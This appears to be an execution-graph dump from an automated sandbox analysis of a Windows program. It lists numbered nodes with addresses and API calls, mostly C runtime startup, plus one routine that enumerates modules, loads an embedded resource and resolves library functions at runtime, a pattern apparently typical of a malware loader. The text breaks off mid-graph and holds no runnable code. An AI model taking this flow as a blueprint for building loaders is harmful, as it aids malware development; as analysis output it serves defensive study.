                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:4.6%
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:1240
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:23
                                                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 12451 40cbdd 12452 40cbe9 12451->12452 12495 40d534 HeapCreate 12452->12495 12455 40cc46 12619 41087e GetModuleHandleW 12455->12619 12458 40cc4c 12459 40cc50 12458->12459 12460 40cc58 __RTC_Initialize 12458->12460 12461 40cbb4 _fast_error_exit 62 API calls 12459->12461 12497 411a15 12460->12497 12462 40cc57 12461->12462 12462->12460 12464 40cc66 12465 40cc72 GetCommandLineA 12464->12465 12466 40cc6a 12464->12466 12512 412892 12465->12512 12652 40e79a 12466->12652 12472 40cc8c 12473 40cc90 12472->12473 12474 40cc98 12472->12474 12475 40e79a __amsg_exit 62 API calls 12473->12475 12537 41255f 12474->12537 12477 40cc97 12475->12477 12477->12474 12479 40cca1 12481 40e79a __amsg_exit 62 API calls 12479->12481 12480 40cca9 12551 40e859 12480->12551 12483 40cca8 12481->12483 12483->12480 12484 40ccb0 12485 40ccb5 12484->12485 12486 40ccbc 12484->12486 12487 40e79a __amsg_exit 62 API calls 12485->12487 12557 4019f0 OleInitialize 12486->12557 12489 40ccbb 12487->12489 12489->12486 12490 40ccd8 12491 40ccea 12490->12491 12670 40ea0a 12490->12670 12673 40ea36 12491->12673 12494 40ccef __sopen_helper 12496 40cc3a 12495->12496 12496->12455 12611 40cbb4 12496->12611 12676 40e1d8 12497->12676 12499 411a21 GetStartupInfoA 12677 411cba 12499->12677 12501 411a42 12502 411c60 __sopen_helper 12501->12502 12504 411cba __calloc_crt 62 API calls 12501->12504 12507 411ba7 12501->12507 12510 411b2a 12501->12510 12502->12464 12503 411bdd GetStdHandle 12503->12507 12504->12501 12505 411c42 SetHandleCount 12505->12502 12506 411bef GetFileType 12506->12507 12507->12502 12507->12503 12507->12505 12507->12506 12508 41389c __ioinit InitializeCriticalSectionAndSpinCount 12507->12508 12508->12507 12509 411b53 GetFileType 12509->12510 12510->12502 12510->12507 12510->12509 12682 41389c 12510->12682 12513 4128b0 GetEnvironmentStringsW 12512->12513 12514 4128cf 12512->12514 12515 4128c4 GetLastError 12513->12515 12516 4128b8 12513->12516 12514->12516 12517 412968 12514->12517 12515->12514 12518 4128eb GetEnvironmentStringsW 12516->12518 12519 4128fa WideCharToMultiByte 12516->12519 12520 412971 GetEnvironmentStrings 12517->12520 12521 40cc82 12517->12521 12518->12519 12518->12521 12524 41295d FreeEnvironmentStringsW 12519->12524 12525 41292e 12519->12525 12520->12521 12522 412981 12520->12522 12659 4127d7 12521->12659 12526 411c75 __malloc_crt 62 API calls 12522->12526 12524->12521 12527 411c75 __malloc_crt 62 API calls 12525->12527 12528 41299b 12526->12528 12529 412934 12527->12529 12530 4129a2 FreeEnvironmentStringsA 12528->12530 12531 4129ae _realloc 12528->12531 12529->12524 12532 41293c WideCharToMultiByte 12529->12532 12530->12521 12535 4129b8 FreeEnvironmentStringsA 12531->12535 12533 412956 12532->12533 12534 41294e 12532->12534 12533->12524 12536 40b6b5 ___freetlocinfo 62 API calls 12534->12536 12535->12521 12536->12533 12538 412568 12537->12538 12541 41256d _strlen 12537->12541 13020 41446b 12538->13020 12540 411cba __calloc_crt 62 API calls 12549 4125a2 _strlen 12540->12549 12541->12540 12544 40cc9d 12541->12544 12542 412600 12543 40b6b5 ___freetlocinfo 62 API calls 12542->12543 12543->12544 12544->12479 12544->12480 12545 411cba __calloc_crt 62 API calls 12545->12549 12546 412626 12547 40b6b5 ___freetlocinfo 62 API calls 12546->12547 12547->12544 12548 40ef42 _strcpy_s 62 API calls 12548->12549 12549->12542 12549->12544 12549->12545 12549->12546 12549->12548 12550 40e61c __invoke_watson 10 API calls 12549->12550 12550->12549 12552 40e867 __IsNonwritableInCurrentImage 12551->12552 13425 413586 12552->13425 12554 40e885 __initterm_e 12556 40e8a4 __IsNonwritableInCurrentImage __initterm 12554->12556 13429 40d2bd 12554->13429 12556->12484 12558 401ab9 12557->12558 13529 40b99e 12558->13529 12560 401abf 12561 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 12560->12561 12591 402467 12560->12591 12562 401dc3 CloseHandle GetModuleHandleA 12561->12562 12569 401c55 12561->12569 13542 401650 12562->13542 12564 401e8b FindResourceA LoadResource LockResource SizeofResource 12565 40b84d _malloc 62 API calls 12564->12565 12566 401ebf 12565->12566 13544 40af66 12566->13544 12568 401c9c CloseHandle 12568->12490 12569->12568 12574 401cf9 Module32Next 12569->12574 12570 401ecb _memset 12571 401efc SizeofResource 12570->12571 12572 401f1c 12571->12572 12573 401f5f 12571->12573 12572->12573 13582 401560 12572->13582 12576 401f92 _memset 12573->12576 12577 401560 __VEC_memcpy 12573->12577 12574->12562 12583 401d0f 12574->12583 12578 401fa2 FreeResource 12576->12578 12577->12576 12579 40b84d _malloc 62 API calls 12578->12579 12580 401fbb SizeofResource 12579->12580 12581 401fe5 _memset 12580->12581 12582 4020aa LoadLibraryA 12581->12582 12584 401650 12582->12584 12583->12568 12586 401dad Module32Next 12583->12586 12585 40216c GetProcAddress 12584->12585 12587 4021aa 12585->12587 12585->12591 12586->12562 12586->12583 12587->12591 13556 4018f0 12587->13556 12589 40243f 12590 40b6b5 ___freetlocinfo 62 API calls 12589->12590 12589->12591 12590->12591 12591->12490 12592 4021f1 12592->12589 13568 401870 12592->13568 12594 402269 #8 12595 401870 75 API calls 12594->12595 12596 40228b #8 12595->12596 12597 4022a7 12596->12597 12598 4022d9 #15 #23 12597->12598 13573 40b350 12598->13573 12601 40232c 12602 402354 #16 12601->12602 12603 40235b 12601->12603 12602->12603 12604 402392 #411 12603->12604 12605 4023a4 12604->12605 12606 4023bc #9 #9 12605->12606 13575 4019a0 12606->13575 12609 40242e 12610 4019a0 65 API calls 12609->12610 12610->12589 12612 40cbc2 12611->12612 12613 40cbc7 12611->12613 12614 40ec4d __FF_MSGBANNER 62 API calls 12612->12614 12615 40eaa2 __NMSG_WRITE 62 API calls 12613->12615 12614->12613 12616 40cbcf 12615->12616 12617 40e7ee _malloc 3 API calls 12616->12617 12618 40cbd9 12617->12618 12618->12455 12620 410892 12619->12620 12621 410898 12619->12621 12622 40e76a __crt_waiting_on_module_handle 2 API calls 12620->12622 12623 410a01 12621->12623 12624 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12621->12624 12622->12621 13858 410598 12623->13858 12628 4108ec TlsAlloc 12624->12628 12627 410a06 12627->12458 12628->12627 12629 41093a TlsSetValue 12628->12629 12629->12627 12630 41094b 12629->12630 13847 40ea54 12630->13847 12633 41046e __encode_pointer 6 API calls 12634 41095b 12633->12634 12635 41046e __encode_pointer 6 API calls 12634->12635 12636 41096b 12635->12636 12637 41046e __encode_pointer 6 API calls 12636->12637 12638 41097b 12637->12638 12639 41046e __encode_pointer 6 API calls 12638->12639 12640 41098b 12639->12640 13854 40d564 12640->13854 12643 4104e9 __decode_pointer 6 API calls 12644 4109ac 12643->12644 12644->12623 12645 411cba __calloc_crt 62 API calls 12644->12645 12646 4109c5 12645->12646 12646->12623 12647 4104e9 __decode_pointer 6 API calls 12646->12647 12648 4109df 12647->12648 12648->12623 12649 4109e6 12648->12649 12650 4105d5 __initptd 62 API calls 12649->12650 12651 4109ee GetCurrentThreadId 12650->12651 12651->12627 12653 40ec4d __FF_MSGBANNER 62 API calls 12652->12653 12654 40e7a4 12653->12654 12655 40eaa2 __NMSG_WRITE 62 API calls 12654->12655 12656 40e7ac 12655->12656 12657 4104e9 __decode_pointer 6 API calls 12656->12657 12658 40cc71 12657->12658 12658->12465 12660 4127f1 GetModuleFileNameA 12659->12660 12661 4127ec 12659->12661 12663 412818 12660->12663 12662 41446b ___initmbctable 106 API calls 12661->12662 12662->12660 13867 41263d 12663->13867 12665 412874 12665->12472 12667 411c75 __malloc_crt 62 API calls 12668 41285a 12667->12668 12668->12665 12669 41263d _parse_cmdline 72 API calls 12668->12669 12669->12665 13879 40e8de 12670->13879 12672 40ea1b 12672->12491 12674 40e8de _doexit 62 API calls 12673->12674 12675 40ea41 12674->12675 12675->12494 12676->12499 12681 411cc3 12677->12681 12679 411d00 12679->12501 12680 411ce1 Sleep 12680->12681 12681->12679 12681->12680 12686 40e231 12681->12686 13019 40e1d8 12682->13019 12684 4138a8 InitializeCriticalSectionAndSpinCount 12685 4138ec __sopen_helper 12684->12685 12685->12510 12687 40e23d __sopen_helper 12686->12687 12688 40e255 12687->12688 12696 40e274 _memset 12687->12696 12699 40bfc1 12688->12699 12692 40e2e6 HeapAlloc 12692->12696 12695 40e26a __sopen_helper 12695->12681 12696->12692 12696->12695 12705 40d6e0 12696->12705 12712 40def2 12696->12712 12718 40e32d 12696->12718 12721 40d2e3 12696->12721 12724 4106bc GetLastError 12699->12724 12701 40bfc6 12702 40e744 12701->12702 12703 4104e9 __decode_pointer 6 API calls 12702->12703 12704 40e754 __invoke_watson 12703->12704 12706 40d6f5 12705->12706 12707 40d708 EnterCriticalSection 12705->12707 12802 40d61d 12706->12802 12707->12696 12709 40d6fb 12709->12707 12710 40e79a __amsg_exit 61 API calls 12709->12710 12711 40d707 12710->12711 12711->12707 12714 40df20 12712->12714 12713 40dfb9 12716 40dfc2 12713->12716 13014 40db09 12713->13014 12714->12713 12714->12716 13007 40da59 12714->13007 12716->12696 13018 40d606 LeaveCriticalSection 12718->13018 12720 40e334 12720->12696 12722 4104e9 __decode_pointer 6 API calls 12721->12722 12723 40d2f3 12722->12723 12723->12696 12738 410564 TlsGetValue 12724->12738 12727 410729 SetLastError 12727->12701 12728 411cba __calloc_crt 59 API calls 12729 4106e7 12728->12729 12729->12727 12743 4104e9 TlsGetValue 12729->12743 12732 410720 12771 40b6b5 12732->12771 12733 410708 12753 4105d5 12733->12753 12736 410710 GetCurrentThreadId 12736->12727 12737 410726 12737->12727 12739 410594 12738->12739 12740 410579 12738->12740 12739->12727 12739->12728 12741 4104e9 __decode_pointer 6 API calls 12740->12741 12742 410584 TlsSetValue 12741->12742 12742->12739 12744 410501 12743->12744 12745 410522 GetModuleHandleW 12743->12745 12744->12745 12746 41050b TlsGetValue 12744->12746 12747 410532 12745->12747 12748 41053d GetProcAddress 12745->12748 12750 410516 12746->12750 12777 40e76a 12747->12777 12752 41051a 12748->12752 12750->12745 12750->12752 12752->12732 12752->12733 12781 40e1d8 12753->12781 12755 4105e1 GetModuleHandleW 12756 4105f1 12755->12756 12757 4105f7 12755->12757 12758 40e76a __crt_waiting_on_module_handle 2 API calls 12756->12758 12759 410633 12757->12759 12760 41060f GetProcAddress GetProcAddress 12757->12760 12758->12757 12761 40d6e0 __lock 58 API calls 12759->12761 12760->12759 12762 410652 InterlockedIncrement 12761->12762 12782 4106aa 12762->12782 12765 40d6e0 __lock 58 API calls 12766 410673 12765->12766 12785 4145d2 InterlockedIncrement 12766->12785 12768 410691 12797 4106b3 12768->12797 12770 41069e __sopen_helper 12770->12736 12772 40b6c1 __sopen_helper 12771->12772 12773 40b73d __sopen_helper 12772->12773 12774 40b714 HeapFree 12772->12774 12773->12737 12774->12773 12775 40b727 12774->12775 12776 40bfc1 __read_nolock 61 API calls 12775->12776 12776->12773 12778 40e775 Sleep GetModuleHandleW 12777->12778 12779 40e793 12778->12779 12780 40e797 12778->12780 12779->12778 12779->12780 12780->12748 12780->12752 12781->12755 12800 40d606 LeaveCriticalSection 12782->12800 12784 41066c 12784->12765 12786 4145f0 InterlockedIncrement 12785->12786 12787 4145f3 12785->12787 12786->12787 12788 414600 12787->12788 12789 4145fd InterlockedIncrement 12787->12789 12790 41460a InterlockedIncrement 12788->12790 12791 41460d 12788->12791 12789->12788 12790->12791 12792 414617 InterlockedIncrement 12791->12792 12794 41461a 12791->12794 12792->12794 12793 414633 InterlockedIncrement 12793->12794 12794->12793 12795 414643 InterlockedIncrement 12794->12795 12796 41464e InterlockedIncrement 12794->12796 12795->12794 12796->12768 12801 40d606 LeaveCriticalSection 12797->12801 12799 4106ba 12799->12770 12800->12784 12801->12799 12803 40d629 __sopen_helper 12802->12803 12817 40d64f 12803->12817 12828 40ec4d 12803->12828 12809 40d680 12814 40d6e0 __lock 62 API calls 12809->12814 12810 40d671 12813 40bfc1 __read_nolock 62 API calls 12810->12813 12811 40d65f __sopen_helper 12811->12709 12813->12811 12816 40d687 12814->12816 12818 40d6bb 12816->12818 12819 40d68f 12816->12819 12817->12811 12874 411c75 12817->12874 12820 40b6b5 ___freetlocinfo 62 API calls 12818->12820 12821 41389c __ioinit InitializeCriticalSectionAndSpinCount 12819->12821 12822 40d6ac 12820->12822 12823 40d69a 12821->12823 12879 40d6d7 12822->12879 12823->12822 12825 40b6b5 ___freetlocinfo 62 API calls 12823->12825 12826 40d6a6 12825->12826 12827 40bfc1 __read_nolock 62 API calls 12826->12827 12827->12822 12882 413d5b 12828->12882 12831 413d5b __set_error_mode 62 API calls 12833 40ec61 12831->12833 12832 40eaa2 __NMSG_WRITE 62 API calls 12834 40ec79 12832->12834 12833->12832 12835 40d63e 12833->12835 12836 40eaa2 __NMSG_WRITE 62 API calls 12834->12836 12837 40eaa2 12835->12837 12836->12835 12838 40eab6 12837->12838 12839 413d5b __set_error_mode 59 API calls 12838->12839 12870 40d645 12838->12870 12840 40ead8 12839->12840 12841 40ec16 GetStdHandle 12840->12841 12843 413d5b __set_error_mode 59 API calls 12840->12843 12842 40ec24 _strlen 12841->12842 12841->12870 12846 40ec3d WriteFile 12842->12846 12842->12870 12844 40eae9 12843->12844 12844->12841 12845 40eafb 12844->12845 12845->12870 12888 40ef42 12845->12888 12846->12870 12849 40eb31 GetModuleFileNameA 12851 40eb4f 12849->12851 12855 40eb72 _strlen 12849->12855 12853 40ef42 _strcpy_s 59 API calls 12851->12853 12854 40eb5f 12853->12854 12854->12855 12856 40e61c __invoke_watson 10 API calls 12854->12856 12867 40ebb5 12855->12867 12904 411da6 12855->12904 12856->12855 12859 40ebd9 12863 413ce7 _strcat_s 59 API calls 12859->12863 12862 40e61c __invoke_watson 10 API calls 12862->12859 12864 40ebed 12863->12864 12866 40ebfe 12864->12866 12868 40e61c __invoke_watson 10 API calls 12864->12868 12865 40e61c __invoke_watson 10 API calls 12865->12867 12922 413b7e 12866->12922 12913 413ce7 12867->12913 12868->12866 12871 40e7ee 12870->12871 12973 40e7c3 GetModuleHandleW 12871->12973 12876 411c7e 12874->12876 12877 40d66a 12876->12877 12878 411c95 Sleep 12876->12878 12976 40b84d 12876->12976 12877->12809 12877->12810 12878->12876 13006 40d606 LeaveCriticalSection 12879->13006 12881 40d6de 12881->12811 12883 413d6a 12882->12883 12884 40ec54 12883->12884 12885 40bfc1 __read_nolock 62 API calls 12883->12885 12884->12831 12884->12833 12886 413d8d 12885->12886 12887 40e744 __read_nolock 6 API calls 12886->12887 12887->12884 12889 40ef53 12888->12889 12890 40ef5a 12888->12890 12889->12890 12895 40ef80 12889->12895 12891 40bfc1 __read_nolock 62 API calls 12890->12891 12892 40ef5f 12891->12892 12893 40e744 __read_nolock 6 API calls 12892->12893 12894 40eb1d 12893->12894 12894->12849 12897 40e61c 12894->12897 12895->12894 12896 40bfc1 __read_nolock 62 API calls 12895->12896 12896->12892 12949 40ba30 12897->12949 12899 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12900 40e725 GetCurrentProcess TerminateProcess 12899->12900 12901 40e719 __invoke_watson 12899->12901 12951 40ce09 12900->12951 12901->12900 12903 40e742 12903->12849 12909 411db8 12904->12909 12905 411dbc 12906 40eba2 12905->12906 12907 40bfc1 __read_nolock 62 API calls 12905->12907 12906->12865 12906->12867 12908 411dd8 12907->12908 12910 40e744 __read_nolock 6 API calls 12908->12910 12909->12905 12909->12906 12911 411e02 12909->12911 12910->12906 12911->12906 12912 40bfc1 __read_nolock 62 API calls 12911->12912 12912->12908 12914 413cff 12913->12914 12916 413cf8 12913->12916 12915 40bfc1 __read_nolock 62 API calls 12914->12915 12921 413d04 12915->12921 12916->12914 12919 413d33 12916->12919 12917 40e744 __read_nolock 6 API calls 12918 40ebc8 12917->12918 12918->12859 12918->12862 12919->12918 12920 40bfc1 __read_nolock 62 API calls 12919->12920 12920->12921 12921->12917 12960 4104e0 12922->12960 12925 413ba1 LoadLibraryA 12926 413bb6 GetProcAddress 12925->12926 12939 413ccb 12925->12939 12928 413bcc 12926->12928 12926->12939 12927 413c29 12932 4104e9 __decode_pointer 6 API calls 12927->12932 12946 413c53 12927->12946 12963 41046e TlsGetValue 12928->12963 12930 4104e9 __decode_pointer 6 API calls 12930->12939 12931 4104e9 __decode_pointer 6 API calls 12940 413c96 12931->12940 12934 413c46 12932->12934 12935 4104e9 __decode_pointer 6 API calls 12934->12935 12935->12946 12936 41046e __encode_pointer 6 API calls 12937 413be7 GetProcAddress 12936->12937 12938 41046e __encode_pointer 6 API calls 12937->12938 12941 413bfc GetProcAddress 12938->12941 12939->12870 12943 4104e9 __decode_pointer 6 API calls 12940->12943 12945 413c7e 12940->12945 12942 41046e __encode_pointer 6 API calls 12941->12942 12944 413c11 12942->12944 12943->12945 12944->12927 12947 413c1b GetProcAddress 12944->12947 12945->12930 12946->12931 12946->12945 12948 41046e __encode_pointer 6 API calls 12947->12948 12948->12927 12950 40ba3c __VEC_memzero 12949->12950 12950->12899 12952 40ce11 12951->12952 12953 40ce13 IsDebuggerPresent 12951->12953 12952->12903 12959 4138fc 12953->12959 12956 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 12957 41372b GetCurrentProcess TerminateProcess 12956->12957 12958 413723 __invoke_watson 12956->12958 12957->12903 12958->12957 12959->12956 12961 41046e __encode_pointer 6 API calls 12960->12961 12962 4104e7 12961->12962 12962->12925 12962->12927 12964 4104a7 GetModuleHandleW 12963->12964 12965 410486 12963->12965 12967 4104c2 GetProcAddress 12964->12967 12968 4104b7 12964->12968 12965->12964 12966 410490 TlsGetValue 12965->12966 12972 41049b 12966->12972 12970 41049f GetProcAddress 12967->12970 12969 40e76a __crt_waiting_on_module_handle 2 API calls 12968->12969 12971 4104bd 12969->12971 12970->12936 12971->12967 12971->12970 12972->12964 12972->12970 12974 40e7d7 GetProcAddress 12973->12974 12975 40e7e7 ExitProcess 12973->12975 12974->12975 12977 40b900 12976->12977 12987 40b85f 12976->12987 12978 40d2e3 _realloc 6 API calls 12977->12978 12979 40b906 12978->12979 12981 40bfc1 __read_nolock 61 API calls 12979->12981 12980 40ec4d __FF_MSGBANNER 61 API calls 12985 40b870 12980->12985 12993 40b8f8 12981->12993 12983 40eaa2 __NMSG_WRITE 61 API calls 12983->12985 12984 40b8bc HeapAlloc 12984->12987 12985->12980 12985->12983 12986 40e7ee _malloc 3 API calls 12985->12986 12985->12987 12986->12985 12987->12984 12987->12985 12988 40b8ec 12987->12988 12990 40d2e3 _realloc 6 API calls 12987->12990 12991 40b8f1 12987->12991 12987->12993 12994 40b7fe 12987->12994 12989 40bfc1 __read_nolock 61 API calls 12988->12989 12989->12991 12990->12987 12992 40bfc1 __read_nolock 61 API calls 12991->12992 12992->12993 12993->12876 12995 40b80a __sopen_helper 12994->12995 12996 40d6e0 __lock 62 API calls 12995->12996 12997 40b83b __sopen_helper 12995->12997 12998 40b820 12996->12998 12997->12987 12999 40def2 ___sbh_alloc_block 5 API calls 12998->12999 13000 40b82b 12999->13000 13002 40b844 13000->13002 13005 40d606 LeaveCriticalSection 13002->13005 13004 40b84b 13004->12997 13005->13004 13006->12881 13008 40daa0 HeapAlloc 13007->13008 13009 40da6c HeapReAlloc 13007->13009 13010 40dac3 VirtualAlloc 13008->13010 13011 40da8a 13008->13011 13009->13011 13012 40da8e 13009->13012 13010->13011 13013 40dadd HeapFree 13010->13013 13011->12713 13012->13008 13013->13011 13015 40db20 VirtualAlloc 13014->13015 13017 40db67 13015->13017 13017->12716 13018->12720 13019->12684 13021 414474 13020->13021 13022 41447b 13020->13022 13024 4142d1 13021->13024 13022->12541 13025 4142dd __sopen_helper 13024->13025 13055 410735 13025->13055 13029 4142f0 13076 414070 13029->13076 13032 411c75 __malloc_crt 62 API calls 13033 414311 13032->13033 13034 414430 __sopen_helper 13033->13034 13083 4140ec 13033->13083 13034->13022 13037 414341 InterlockedDecrement 13039 414351 13037->13039 13040 414362 InterlockedIncrement 13037->13040 13038 41443d 13038->13034 13041 414450 13038->13041 13043 40b6b5 ___freetlocinfo 62 API calls 13038->13043 13039->13040 13045 40b6b5 ___freetlocinfo 62 API calls 13039->13045 13040->13034 13042 414378 13040->13042 13044 40bfc1 __read_nolock 62 API calls 13041->13044 13042->13034 13047 40d6e0 __lock 62 API calls 13042->13047 13043->13041 13044->13034 13046 414361 13045->13046 13046->13040 13049 41438c InterlockedDecrement 13047->13049 13050 414408 13049->13050 13051 41441b InterlockedIncrement 13049->13051 13050->13051 13053 40b6b5 ___freetlocinfo 62 API calls 13050->13053 13093 414432 13051->13093 13054 41441a 13053->13054 13054->13051 13056 4106bc __getptd_noexit 62 API calls 13055->13056 13057 41073d 13056->13057 13058 40e79a __amsg_exit 62 API calls 13057->13058 13059 41074a 13057->13059 13058->13059 13060 413fcc 13059->13060 13061 413fd8 __sopen_helper 13060->13061 13062 410735 __getptd 62 API calls 13061->13062 13063 413fdd 13062->13063 13064 40d6e0 __lock 62 API calls 13063->13064 13065 413fef 13063->13065 13066 41400d 13064->13066 13068 413ffd __sopen_helper 13065->13068 13072 40e79a __amsg_exit 62 API calls 13065->13072 13067 414056 13066->13067 13069 414024 InterlockedDecrement 13066->13069 13070 41403e InterlockedIncrement 13066->13070 13096 414067 13067->13096 13068->13029 13069->13070 13073 41402f 13069->13073 13070->13067 13072->13068 13073->13070 13074 40b6b5 ___freetlocinfo 62 API calls 13073->13074 13075 41403d 13074->13075 13075->13070 13100 40ec86 13076->13100 13079 4140ad 13081 4140b2 GetACP 13079->13081 13082 41409f 13079->13082 13080 41408f GetOEMCP 13080->13082 13081->13082 13082->13032 13082->13034 13084 414070 getSystemCP 74 API calls 13083->13084 13085 41410c 13084->13085 13086 414117 setSBCS 13085->13086 13089 41415b IsValidCodePage 13085->13089 13092 414180 _memset __setmbcp_nolock 13085->13092 13087 40ce09 __cftog_l 5 API calls 13086->13087 13088 4142cf 13087->13088 13088->13037 13088->13038 13089->13086 13090 41416d GetCPInfo 13089->13090 13090->13086 13090->13092 13291 413e39 GetCPInfo 13092->13291 13424 40d606 LeaveCriticalSection 13093->13424 13095 414439 13095->13034 13099 40d606 LeaveCriticalSection 13096->13099 13098 41406e 13098->13065 13099->13098 13101 40ec99 13100->13101 13105 40ece6 13100->13105 13102 410735 __getptd 62 API calls 13101->13102 13103 40ec9e 13102->13103 13104 40ecc6 13103->13104 13108 414738 13103->13108 13104->13105 13107 413fcc _LocaleUpdate::_LocaleUpdate 64 API calls 13104->13107 13105->13079 13105->13080 13107->13105 13109 414744 __sopen_helper 13108->13109 13110 410735 __getptd 62 API calls 13109->13110 13111 414749 13110->13111 13112 414777 13111->13112 13114 41475b 13111->13114 13113 40d6e0 __lock 62 API calls 13112->13113 13115 41477e 13113->13115 13116 410735 __getptd 62 API calls 13114->13116 13123 4146fa 13115->13123 13117 414760 13116->13117 13120 41476e __sopen_helper 13117->13120 13122 40e79a __amsg_exit 62 API calls 13117->13122 13120->13104 13122->13120 13124 4146fe 13123->13124 13125 414730 13123->13125 13124->13125 13126 4145d2 ___addlocaleref 8 API calls 13124->13126 13131 4147a2 13125->13131 13127 414711 13126->13127 13127->13125 13134 414661 13127->13134 13290 40d606 LeaveCriticalSection 13131->13290 13133 4147a9 13133->13117 13135 414672 InterlockedDecrement 13134->13135 13136 4146f5 13134->13136 13137 414687 InterlockedDecrement 13135->13137 13138 41468a 13135->13138 13136->13125 13148 414489 13136->13148 13137->13138 13139 414694 InterlockedDecrement 13138->13139 13140 414697 13138->13140 13139->13140 13141 4146a1 InterlockedDecrement 13140->13141 13142 4146a4 13140->13142 13141->13142 13143 4146ae InterlockedDecrement 13142->13143 13145 4146b1 13142->13145 13143->13145 13144 4146ca InterlockedDecrement 13144->13145 13145->13144 13146 4146da InterlockedDecrement 13145->13146 13147 4146e5 InterlockedDecrement 13145->13147 13146->13145 13147->13136 13149 41450d 13148->13149 13151 4144a0 13148->13151 13150 41455a 13149->13150 13152 40b6b5 ___freetlocinfo 62 API calls 13149->13152 13163 414581 13150->13163 13202 417667 13150->13202 13151->13149 13154 4144d4 13151->13154 13160 40b6b5 ___freetlocinfo 62 API calls 13151->13160 13155 41452e 13152->13155 13167 40b6b5 ___freetlocinfo 62 API calls 13154->13167 13177 4144f5 13154->13177 13157 40b6b5 ___freetlocinfo 62 API calls 13155->13157 13162 414541 13157->13162 13158 40b6b5 ___freetlocinfo 62 API calls 13164 414502 13158->13164 13159 40b6b5 ___freetlocinfo 62 API calls 13159->13163 13165 4144c9 13160->13165 13161 4145c6 13166 40b6b5 ___freetlocinfo 62 API calls 13161->13166 13169 40b6b5 ___freetlocinfo 62 API calls 13162->13169 13163->13161 13168 40b6b5 62 API calls ___freetlocinfo 13163->13168 13170 40b6b5 ___freetlocinfo 62 API calls 13164->13170 13178 417841 13165->13178 13172 4145cc 13166->13172 13173 4144ea 13167->13173 13168->13163 13174 41454f 13169->13174 13170->13149 13172->13125 13194 4177fc 13173->13194 13176 40b6b5 ___freetlocinfo 62 API calls 13174->13176 13176->13150 13177->13158 13179 4178cb 13178->13179 13180 41784e 13178->13180 13179->13154 13181 41785f 13180->13181 13182 40b6b5 ___freetlocinfo 62 API calls 13180->13182 13183 417871 13181->13183 13184 40b6b5 ___freetlocinfo 62 API calls 13181->13184 13182->13181 13185 417883 13183->13185 13186 40b6b5 ___freetlocinfo 62 API calls 13183->13186 13184->13183 13187 417895 13185->13187 13189 40b6b5 ___freetlocinfo 62 API calls 13185->13189 13186->13185 13188 4178a7 13187->13188 13190 40b6b5 ___freetlocinfo 62 API calls 13187->13190 13191 4178b9 13188->13191 13192 40b6b5 ___freetlocinfo 62 API calls 13188->13192 13189->13187 13190->13188 13191->13179 13193 40b6b5 ___freetlocinfo 62 API calls 13191->13193 13192->13191 13193->13179 13195 417809 13194->13195 13201 41783d 13194->13201 13196 40b6b5 ___freetlocinfo 62 API calls 13195->13196 13197 417819 13195->13197 13196->13197 13198 41782b 13197->13198 13199 40b6b5 ___freetlocinfo 62 API calls 13197->13199 13200 40b6b5 ___freetlocinfo 62 API calls 13198->13200 13198->13201 13199->13198 13200->13201 13201->13177 13203 41457a 13202->13203 13204 417678 13202->13204 13203->13159 13205 40b6b5 ___freetlocinfo 62 API calls 13204->13205 13206 417680 13205->13206 13207 40b6b5 ___freetlocinfo 62 API calls 13206->13207 13208 417688 13207->13208 13209 40b6b5 ___freetlocinfo 62 API calls 13208->13209 13210 417690 13209->13210 13211 40b6b5 ___freetlocinfo 62 API calls 13210->13211 13212 417698 13211->13212 13213 40b6b5 ___freetlocinfo 62 API calls 13212->13213 13214 4176a0 13213->13214 13215 40b6b5 ___freetlocinfo 62 API calls 13214->13215 13216 4176a8 13215->13216 13217 40b6b5 ___freetlocinfo 62 API calls 13216->13217 13218 4176af 13217->13218 13219 40b6b5 ___freetlocinfo 62 API calls 13218->13219 13220 4176b7 13219->13220 13221 40b6b5 ___freetlocinfo 62 API calls 13220->13221 13222 4176bf 13221->13222 13223 40b6b5 ___freetlocinfo 62 API calls 13222->13223 13224 4176c7 13223->13224 13225 40b6b5 ___freetlocinfo 62 API calls 13224->13225 13226 4176cf 13225->13226 13227 40b6b5 ___freetlocinfo 62 API calls 13226->13227 13228 4176d7 13227->13228 13229 40b6b5 ___freetlocinfo 62 API calls 13228->13229 13230 4176df 13229->13230 13231 40b6b5 ___freetlocinfo 62 API calls 13230->13231 13232 4176e7 13231->13232 13233 40b6b5 ___freetlocinfo 62 API calls 13232->13233 13234 4176ef 13233->13234 13235 40b6b5 ___freetlocinfo 62 API calls 13234->13235 13236 4176f7 13235->13236 13237 40b6b5 ___freetlocinfo 62 API calls 13236->13237 13238 417702 13237->13238 13239 40b6b5 ___freetlocinfo 62 API calls 13238->13239 13240 41770a 13239->13240 13241 40b6b5 ___freetlocinfo 62 API calls 13240->13241 13242 417712 13241->13242 13243 40b6b5 ___freetlocinfo 62 API calls 13242->13243 13244 41771a 13243->13244 13245 40b6b5 ___freetlocinfo 62 API calls 13244->13245 13246 417722 13245->13246 13247 40b6b5 ___freetlocinfo 62 API calls 13246->13247 13248 41772a 13247->13248 13249 40b6b5 ___freetlocinfo 62 API calls 13248->13249 13250 417732 13249->13250 13251 40b6b5 ___freetlocinfo 62 API calls 13250->13251 13252 41773a 13251->13252 13253 40b6b5 ___freetlocinfo 62 API calls 13252->13253 13254 417742 13253->13254 13255 40b6b5 ___freetlocinfo 62 API calls 13254->13255 13256 41774a 13255->13256 13257 40b6b5 ___freetlocinfo 62 API calls 13256->13257 13258 417752 13257->13258 13259 40b6b5 ___freetlocinfo 62 API calls 13258->13259 13260 41775a 13259->13260 13261 40b6b5 ___freetlocinfo 62 API calls 13260->13261 13262 417762 13261->13262 13263 40b6b5 ___freetlocinfo 62 API calls 13262->13263 13264 41776a 13263->13264 13265 40b6b5 ___freetlocinfo 62 API calls 13264->13265 13266 417772 13265->13266 13267 40b6b5 ___freetlocinfo 62 API calls 13266->13267 13268 41777a 13267->13268 13269 40b6b5 ___freetlocinfo 62 API calls 13268->13269 13270 417788 13269->13270 13271 40b6b5 ___freetlocinfo 62 API calls 13270->13271 13272 417793 13271->13272 13273 40b6b5 ___freetlocinfo 62 API calls 13272->13273 13274 41779e 13273->13274 13275 40b6b5 ___freetlocinfo 62 API calls 13274->13275 13276 4177a9 13275->13276 13277 